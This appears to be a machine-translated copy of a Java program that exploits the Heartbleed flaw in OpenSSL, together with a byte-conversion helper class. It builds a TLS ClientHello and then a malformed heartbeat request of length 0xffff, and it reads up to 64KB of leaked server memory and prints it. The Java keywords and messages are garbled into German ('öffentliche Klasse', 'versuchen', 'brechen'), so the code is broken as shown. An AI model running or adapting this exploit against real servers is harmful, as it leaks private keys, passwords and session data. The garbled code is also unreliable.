Java sendet Heartbeat-Heartbeat-Paket (Byte in Hexadezimalzahl)

复制代码代码如下:

Paket com.jxy.web;

import java.io.IOException;

import java.io.InputStream;

import java.io.OutputStream;

import java.io.UnsupportedEncodingException;

java.net.Socket importieren;

import java.net.UnknownHostException;

import com.jxy.tools.MyByte;

öffentliche Klasse Heartbleed {

privates statisches Byte[] hallo = { (Byte) 0x16, (Byte) 0x03, (Byte) 0x02,

(Byte) 0x00, (Byte) 0xdc, (Byte) 0x01, (Byte) 0x00, (Byte) 0x00,

(Byte) 0xd8, (Byte) 0x03, (Byte) 0x02, (Byte) 0x53, (Byte) 0x43,

(Byte) 0x5b, (Byte) 0x90, (Byte) 0x9d, (Byte) 0x9b, (Byte) 0x72,

(Byte) 0x0b, (Byte) 0xbc, (Byte) 0x0c, (Byte) 0xbc, (Byte) 0x2b,

(Byte) 0x92, (Byte) 0xa8, (Byte) 0x48, (Byte) 0x97, (Byte) 0xcf,

(Byte) 0xbd, (Byte) 0x39, (Byte) 0x04, (Byte) 0xcc, (Byte) 0x16,

(Byte) 0x0a, (Byte) 0x85, (Byte) 0x03, (Byte) 0x90, (Byte) 0x9f,

(Byte) 0x77, (Byte) 0x04, (Byte) 0x33, (Byte) 0xd4, (Byte) 0xde,

(Byte) 0x00, (Byte) 0x00, (Byte) 0x66, (Byte) 0xc0, (Byte) 0x14,

(Byte) 0xc0, (Byte) 0x0a, (Byte) 0xc0, (Byte) 0x22, (Byte) 0xc0,

(Byte) 0x21, (Byte) 0x00, (Byte) 0x39, (Byte) 0x00, (Byte) 0x38,

(Byte) 0x00, (Byte) 0x88, (Byte) 0x00, (Byte) 0x87, (Byte) 0xc0,

(Byte) 0x0f, (Byte) 0xc0, (Byte) 0x05, (Byte) 0x00, (Byte) 0x35,

(Byte) 0x00, (Byte) 0x84, (Byte) 0xc0, (Byte) 0x12, (Byte) 0xc0,

(Byte) 0x08, (Byte) 0xc0, (Byte) 0x1c, (Byte) 0xc0, (Byte) 0x1b,

(Byte) 0x00, (Byte) 0x16, (Byte) 0x00, (Byte) 0x13, (Byte) 0xc0,

(Byte) 0x0d, (Byte) 0xc0, (Byte) 0x03, (Byte) 0x00, (Byte) 0x0a,

(Byte) 0xc0, (Byte) 0x13, (Byte) 0xc0, (Byte) 0x09, (Byte) 0xc0,

(Byte) 0x1f, (Byte) 0xc0, (Byte) 0x1e, (Byte) 0x00, (Byte) 0x33,

(Byte) 0x00, (Byte) 0x32, (Byte) 0x00, (Byte) 0x9a, (Byte) 0x00,

(Byte) 0x99, (Byte) 0x00, (Byte) 0x45, (Byte) 0x00, (Byte) 0x44,

(Byte) 0xc0, (Byte) 0x0e, (Byte) 0xc0, (Byte) 0x04, (Byte) 0x00,

(Byte) 0x2f, (Byte) 0x00, (Byte) 0x96, (Byte) 0x00, (Byte) 0x41,

(Byte) 0xc0, (Byte) 0x11, (Byte) 0xc0, (Byte) 0x07, (Byte) 0xc0,

(Byte) 0x0c, (Byte) 0xc0, (Byte) 0x02, (Byte) 0x00, (Byte) 0x05,

(Byte) 0x00, (Byte) 0x04, (Byte) 0x00, (Byte) 0x15, (Byte) 0x00,

(Byte) 0x12, (Byte) 0x00, (Byte) 0x09, (Byte) 0x00, (Byte) 0x14,

(Byte) 0x00, (Byte) 0x11, (Byte) 0x00, (Byte) 0x08, (Byte) 0x00,

(Byte) 0x06, (Byte) 0x00, (Byte) 0x03, (Byte) 0x00, (Byte) 0xff,

(Byte) 0x01, (Byte) 0x00, (Byte) 0x00, (Byte) 0x49, (Byte) 0x00,

(Byte) 0x0b, (Byte) 0x00, (Byte) 0x04, (Byte) 0x03, (Byte) 0x00,

(Byte) 0x01, (Byte) 0x02, (Byte) 0x00, (Byte) 0x0a, (Byte) 0x00,

(Byte) 0x34, (Byte) 0x00, (Byte) 0x32, (Byte) 0x00, (Byte) 0x0e,

(Byte) 0x00, (Byte) 0x0d, (Byte) 0x00, (Byte) 0x19, (Byte) 0x00,

(Byte) 0x0b, (Byte) 0x00, (Byte) 0x0c, (Byte) 0x00, (Byte) 0x18,

(Byte) 0x00, (Byte) 0x09, (Byte) 0x00, (Byte) 0x0a, (Byte) 0x00,

(Byte) 0x16, (Byte) 0x00, (Byte) 0x17, (Byte) 0x00, (Byte) 0x08,

(Byte) 0x00, (Byte) 0x06, (Byte) 0x00, (Byte) 0x07, (Byte) 0x00,

(Byte) 0x14, (Byte) 0x00, (Byte) 0x15, (Byte) 0x00, (Byte) 0x04,

(Byte) 0x00, (Byte) 0x05, (Byte) 0x00, (Byte) 0x12, (Byte) 0x00,

(Byte) 0x13, (Byte) 0x00, (Byte) 0x01, (Byte) 0x00, (Byte) 0x02,

(Byte) 0x00, (Byte) 0x03, (Byte) 0x00, (Byte) 0x0f, (Byte) 0x00,

(Byte) 0x10, (Byte) 0x00, (Byte) 0x11, (Byte) 0x00, (Byte) 0x23,

(Byte) 0x00, (Byte) 0x00, (Byte) 0x00, (Byte) 0x0f, (Byte) 0x00,

(Byte) 0x01, (Byte) 0x01 };

privates statisches Byte[] bleed = { (Byte) 0x18, (Byte) 0x03, (Byte) 0x02,

(Byte) 0x00, (Byte) 0x03, (Byte) 0x01, (Byte) 0xff, (Byte) 0xff };

privates statisches Byte[] tmp;

privates statisches Byte[] pay;

/**

* SSL3_RT_CHANGE_CIPHER_SPEC 20

* SSL3_RT_ALERT 21

* SSL3_RT_HANDSHAKE 22

* SSL3_RT_APPLICATION_DATA 23

* TLS1_RT_HEARTBEAT 24

*

* @param args

* @throws-Ausnahme

*/

public static void main(String[] args) {

attack("改为自己测试的主机", 465);

System.exit(0);

}

öffentlicher statischer boolescher Angriff (String host, int port) {

System.out.println("Erweiterte Datei...");

Socket socket = null;

versuchen {

socket = neuer Socket(Host, Port);

} Catch (UnknownHostException e) {

System.out.println("Erweitert");

return false;

} Catch (IOException e) {

System.out.println("Erinnerung an die Benutzeroberfläche.");

return false;

}

OutputStream out = null;

versuchen {

out = socket.getOutputStream();

} Catch (IOException e) {

System.out.println("Erinnerung an die Benutzeroberfläche.");

return false;

}

InputStream in = null;

versuchen {

in = socket.getInputStream();

} Catch (IOException e) {

System.out.println("Erinnerung an die Benutzeroberfläche.");

return false;

}

System.out.println("Erweiterte Benutzeroberfläche...");

versuchen {

out.write(hello);

} Catch (IOException e) {

System.out.println("Erweiterte Informationen");

return false;

}

System.out.println("Die Datei wird nicht angezeigt...");

while (wahr) {

tmp = getData(in, 5);

if (tmp[0] == 0) {

System.out.println("服务器没有返回心跳包并且关闭了连接.");

return false;

}

analyseHead(tmp);

int len ​​= (int) MyByte.HexString2Long(MyByte

.byteToHexString(tmp[3]) + MyByte.byteToHexString(tmp[4]));

pay = getData(in, len);

if (tmp[0] == 22 && pay[0] == 0x0E) {

System.out.println("Sie können dies auch tun.");

brechen;

}

}

System.out.println("Heartbeat wird angezeigt...");

versuchen {

out.write(bleed);

} Catch (IOException e) {

System.out.println("Heartbeat wird angezeigt.");

return false;

}

versuchen {

out.write(bleed);

} Catch (IOException e) {

System.out.println("Heartbeat wird angezeigt.");

return false;

}

while (wahr) {

tmp = getData(in, 5);

int len ​​= (int) MyByte.HexString2Long(MyByte

.byteToHexString(tmp[3]) + MyByte.byteToHexString(tmp[4]));

if (tmp[0] == 0) {

System.out.println("Heartbeat wird nicht angezeigt, Sie können es nicht verwenden");

return false;

}

if (tmp[0] == 24) {

System.out.println("Heartbeat wird angezeigt:");

int count=0;//Erweiterte Informationen

for (int i = 0; i < 4; i++) {//读4次,全部读出64KB

pay = getData(in, len);

count+=pay.length;

System.out.print(hexdump(pay));

}

System.out.println("/n数据长度为:" + count);

if (len > 3) {

System.out

.println("警告: 服务器返回了原本比它多的数据 -服务器是易受攻击的!");

} anders {

System.out

.println("服务器返回畸形的heartbeat, 没有返回其他额外的数据");

}

brechen;

}

if (tmp[0] == 21) {

System.out.println("Erweiterte Datei:");

System.out.println(hexdump(pay));

System.out.println("服务器返回错误,看起来不是易受攻击的");

brechen;

}

}

versuchen {

out.close();

in.close();

} Catch (IOException e) {

System.out.println("关闭输入输出流异常");

}

return true;

}

öffentliches statisches Byte[] getData(InputStream in, int lenth) {

byte[] t = neues Byte[Länge];

versuchen {

in.read(t);

} Catch (IOException e) {

System.out.println("接受数据错误");

}

Rückkehr t;

}

öffentlicher statischer String hexdump(byte[] pay) {

String s = "";

versuchen {

s = new String(pay, „GB2312“);

} Catch (UnsupportedEncodingException e) {

System.out.println("未知编码");

}

return s;

}

public static void analyseHead(byte[] tmp) {

System.out.print("Weitere Informationen: ");

System.out.print("类型:" + tmp[0] + "/t");

System.out.print("版本:" + MyByte.byteToHexString(tmp[1])

+ MyByte.byteToHexString(tmp[2]) + "/t");

System.out.println("Fehler:"

+ MyByte.HexString2Long(MyByte.byteToHexString(tmp[3])

+ MyByte.byteToHexString(tmp[4])));

}

}

复制代码代码如下:

Paket com.jxy.tools;

/**

* 16 Zeichenketten/Byte-Zeichen

* */

öffentliche Klasse MyByte {

/**

* 字符串转换成十六进制字符串

*

* @param String

* str ASCII-Zeichenfolge

* @return String 每个Byte之间空格分隔, 如: [61 6C 6B]

*/

öffentlicher statischer String str2HexStr(String str) {

char[] chars = "0123456789ABCDEF".toCharArray();

StringBuilder sb = new StringBuilder("");

byte[] bs = str.getBytes();

int bit;

for (int i = 0; i < bs.length; i++) {

bit = (bs[i] & 0x0f0) >> 4;

sb.append(chars[bit]);

bit = bs[i] & 0x0f;

sb.append(chars[bit]);

sb.append('');

}

return sb.toString().trim();

}

/**

* 十六进制转换字符串

*

* @param String

* str Byte字符串(Byte之间无分隔符 如:[616C6B])

* @return String ist eine Zeichenfolge

*/

öffentlicher statischer String hexStr2Str(String hexStr) {

String str = "0123456789ABCDEF";

char[] hexs = hexStr.toCharArray();

byte[] bytes = new byte[hexStr.length() / 2];

int n;

for (int i = 0; i < bytes.length; i++) {

n = str.indexOf(hexs[2 * i]) * 16;

n += str.indexOf(hexs[2 * i + 1]);

bytes[i] = (byte) (n & 0xff);

}

neuen String(Bytes) zurückgeben;

}

/**

* String – Unicode-String

*

* @param String

* strText 全角字符串

* @return String ist ein Unicode-Standard

* @throws-Ausnahme

*/

öffentlicher statischer String strToUnicode(String strText) löst eine Ausnahme aus {

char c;

StringBuilder str = new StringBuilder();

int intAsc;

String strHex;

for (int i = 0; i < strText.length(); i++) {

c = strText.charAt(i);

intAsc = (int) c;

strHex = Integer.toHexString(intAsc);

if (intAsc > 128)

str.append("//u" + strHex);

anders

// 低位在前面补00

str.append("//u00" + strHex);

}

return str.toString();

}

/**

* unicode的String转换成String的字符串

*

* @param String

* hex 16进制值字符串 (一个unicode为2byte)

* @return String Gibt die Zeichenfolge zurück

*/

öffentlicher statischer String unicodeToString(String hex) {

int t = hex.length() / 6;

StringBuilder str = new StringBuilder();

for (int i = 0; i < t; i++) {

String s = hex.substring(i * 6, (i + 1) * 6);

// 高位需要补上00再转

String s1 = s.substring(2, 4) + „00“;

// 低位直接转

String s2 = s.substring(4);

// 将16进制的string转为int

int n = Integer.valueOf(s1, 16) + Integer.valueOf(s2, 16);

// 将int转换为字符

char[] chars = Character.toChars(n);

str.append(new String(chars));

}

return str.toString();

}

/**

* 合并两个byte数组

*

* @param pByteA

* @param pByteB

* @zurückkehren

*/

öffentliches statisches Byte[] getMergeBytes(byte[] pByteA, byte[] pByteB) {

int aCount = pByteA.length;

int bCount = pByteB.length;

byte[] b = neues Byte[aCount + bCount];

for (int i = 0; i < aCount; i++) {

b[i] = pByteA[i];

}

for (int i = 0; i < bCount; i++) {

b[aCount + i] = pByteB[i];

}

Rückkehr b;

}

/**

* 截取byte数据

*

* @param b

* 是byte数组

* @param j

* 是大小

* @zurückkehren

*/

öffentliches statisches Byte[] cutOutByte(byte[] b, int j) {

if (b.length == 0 || j == 0) {

null zurückgeben;

}

byte[] tmp = neues Byte[j];

for (int i = 0; i < j; i++) {

tmp[i] = b[i];

}

return tmp;

}

/**

* 16 Bytes

*

* @param hexstr

* String 16进制字符串

* @return byte[] Byte-Fehler

*/

öffentliches statisches Byte[] HexString2Bytes(String hexstr) {

byte[] b = neues byte[hexstr.length() / 2];

int j = 0;

for (int i = 0; i < b.length; i++) {

char c0 = hexstr.charAt(j++);

char c1 = hexstr.charAt(j++);

b[i] = (Byte) ((parse(c0) << 4) | parse(c1));

}

Rückkehr b;

}

private static int parse(char c) {

if (c >= 'a')

return (c - 'a' + 10) & 0x0f;

if (c >= 'A')

return (c - 'A' + 10) & 0x0f;

return (c - '0') & 0x0f;

}

/**

* Byte

*

* @param b

* @zurückkehren

*/

öffentlicher statischer String byteToHexString(byte b) {

String stmp = Integer.toHexString(b & 0xFF);

stmp = (stmp.length() == 1) ? „0“ + stmp : stmp;

return stmp.toUpperCase();

}

/**

* 将byte转换为int

*

* @param b

* @zurückkehren

*/

öffentliches statisches int byteToInt(byte b) {

return Integer.valueOf(b);

}

/**

* Bytes转换成十六进制字符串

*

* @param byte[] b byte

* @return String Gibt einen Byte-Wert an

*/

öffentlicher statischer String byteToHexString(byte[] b) {

String stmp = "";

StringBuilder sb = new StringBuilder("");

for (Byte c : b) {

stmp = Integer.toHexString (c & 0xFF);

sb.append((stmp.length() == 1) ? "0" + stmp : stmp);// 是一位的话填充零

sb.append(" ");// 每位数据用空格分隔

}

return sb.toString().toUpperCase().trim();// Zurück zum Anfang

}

public static long HexString2Long(String hexstr) {

lange Summe=0;

int length=hexstr.length();

for (int i = 0; i < length; i++) {

sum+=parse(hexstr.charAt(i))*Math.pow(16,length-i-1);

}

Rückgabesumme;

}

}